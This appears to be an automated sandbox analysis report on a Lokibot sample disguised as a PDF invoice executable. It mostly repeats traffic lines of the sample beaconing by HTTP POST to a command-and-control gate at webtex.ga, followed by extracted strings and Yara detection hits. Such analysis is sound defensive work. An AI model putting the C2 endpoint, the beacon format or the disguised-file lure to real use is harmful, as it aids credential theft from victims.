              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00404ED4 recv,
              Source: unknownDNS traffic detected: queries for: webtex.ga
              Source: unknownHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 190Connection: close
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.500191687.000000000049F000.00000040.00000001.sdmpString found in binary or memory: http://webtex.ga/ibiki/gate.php
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.234416730.0000000005F67000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.234416730.0000000005F67000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/9
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224544561.0000000005F72000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnac8
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.224342922.0000000005F71000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnpro
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$T
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3T
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/WTa
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-d
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/eT
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/JT
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225373707.0000000005F68000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/eT
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225477436.0000000005F66000.00000004.00000001.sdmp, PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225166450.0000000005F63000.00000004.00000001.sdmp, PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000003.225636033.0000000005F6A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.240549132.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_0158C0F4
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_0158E538
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_0158E528
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 0_2_054F5C28
